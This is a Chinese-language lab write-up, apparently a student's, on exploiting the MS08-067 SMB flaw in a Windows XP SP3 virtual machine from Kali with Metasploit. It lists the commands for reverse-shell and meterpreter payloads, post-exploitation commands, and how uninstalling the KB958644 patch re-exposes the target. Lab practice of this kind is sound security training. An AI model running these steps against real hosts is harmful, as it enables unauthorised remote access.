MS08_067漏洞滲透攻擊實踐
實驗前准備
1、兩台虛擬機,其中一台為kali,一台為windows xp sp3(英文版)。
2、在VMware中設置兩台虛擬機網絡為NAT模式,自動分配IP地址,之后兩台虛擬機就可以直接ping通。如下圖:
如果ping不通,一般是ip地址不在同一個網段上,需要重新設置xp的ip地址,打開:控制面板->網絡連接->右擊本地連接選擇屬性->選擇internet協議(TCP/IP)->屬性,就可以編輯ip地址了。例如:kali ip是192.168.241.131,xp ip設置為:192.168.241.130。前三位一樣,最后一位隨便設置。
MS08_067遠程漏洞攻擊實踐:Shell
1、在kali終端中開啟msfconsole。
2、輸入命令search ms08_067
,會顯示出找到的滲透模塊,如下圖所示:
3、輸入命令use exploit/windows/smb/ms08_067_netapi
,進入該漏洞模塊的使用。
4、輸入命令show payload
會顯示出有效的攻擊載荷,如下圖所示,我們找到一個shell_reverse_tcp。
5、命令show targets
會顯示出可以被攻擊的靶機的操作系統型號,如下圖所示:
6、使用命令set payload generic/shell_reverse_tcp
設置攻擊有效載荷。
7、輸入命令show options
顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。
8、輸入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"
並使用命令show options
再次查看payload狀態。
9、輸入命令exploit
開始攻擊,如下圖所示是正常攻擊成功結果。
在kali上執行ipconfig/all
得到如下圖所示:
在win xp上執行同樣的命令,如下圖所示:
MS08_067遠程漏洞攻擊實踐:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,進入ms08_067漏洞模塊。
2、設置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要設置的ip地址,如下圖所示,是已經設置好的
4、成功攻擊結果:
5、執行ifconfig
,查看靶機地址:
6、ps
查看進程:
7、meterpreter轉shell:
實驗中遇到的問題
1、在做實驗的時候用老師的xp系統作為靶機,但是在exploit的時候顯示如下:no session was created。
2、手動設置一個set session 1
,結果還是不成功。
3、在exploit
前,使用check
查看靶機狀態,返回以下信息,表明目標主機是安全的,不能被攻擊。
4、網上查到可以卸載ms08_067的補丁,即卸載KB958644,文件路徑:c:/windows找到KB958644(這是個隱藏文件),打開卸載exe程序,如下:
5、重啟后,還是不能成功,最后找了一個英文版的win xp sp 3 ,才成功完成。